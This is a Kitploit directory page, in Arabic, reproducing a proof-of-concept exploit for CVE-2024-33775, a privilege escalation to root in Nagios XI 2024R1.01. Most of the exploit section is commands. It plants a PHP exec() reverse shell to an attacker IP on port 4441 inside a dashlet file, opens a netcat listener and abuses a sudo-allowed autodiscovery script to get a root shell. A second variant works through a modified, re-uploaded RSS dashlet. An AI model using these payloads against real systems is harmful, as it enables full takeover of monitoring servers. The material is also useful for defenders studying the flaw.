Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-33775 | Kitploit
أدوات/GitHubGitHub/neo-xed/cve-2024-33775
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubneo-xed/cve-2024-33775

CVE-2024-33775

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE تم اكتشافها بواسطة: K. Wahab (Neo`X)

تفاصيل الثغرة:

  • المنتج: Nagios XI Version 2024R1.01
  • الثغرة: تصعيد الامتيازات من المستخدمين "NAGIOS" أو "APACHE"
  • النتيجة: وصول كامل بصلاحيات الجذر (root) على النظام المستهدف
  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33775

الاستغلال:

يُستخدم RSS Dashlet في هذا المثال.

1. إنشاء نسخة جديدة من Nagios XI:

  • يمكنك تنزيل ملف OVA الخاص بـ Nagios XI Version 2024R1.01 من: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova

2. تصعيد الامتيازات:

الاستغلال كمستخدم NAGIOS:

  • أضِف المحتوى التالي داخل ملف .inc.php الخاص بـ dashlet في المسار "/usr/local/nagiosxi/html/includes/dashlets/" :
root@kitploit:~
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
  • شغّل خادم استماع Netcat على جهاز المهاجم:
root@kitploit:~
nc -nlvp 4441
  • نفّذ الأمر التالي لتصعيد الامتيازات واستقبال اتصال بصلاحيات الجذر (root):
root@kitploit:~
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1

الاستغلال كمستخدم APACHE:

  • انتقل إلى صفحة إدارة "dashlets" وقم بتنزيل dashlet:

    root@kitploit:~
    http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
    
  • عدّل ملف *.inc.php:

    root@kitploit:~
    exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");
    

Dashlet_inc_php

  • شغّل خادم استماع Netcat على جهاز المهاجم:
root@kitploit:~
nc -nlvp 4441
  • ارفع الـ dashlet الخبيث في صفحة إدارة dashlets وانتظر الاتصال كمستخدم APACHE.
  • نفّذ الأمر التالي لتصعيد الامتيازات واستقبال اتصال بصلاحيات الجذر (root):
root@kitploit:~
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1

(ملاحظة: بعد تنفيذ الأمر ستستقبل اتصالًا كمستخدم APACHE، استخدم CTRL+C للخروج وأعد تشغيل المستمع عدة مرات)

Apache_root

تنزيل الأداة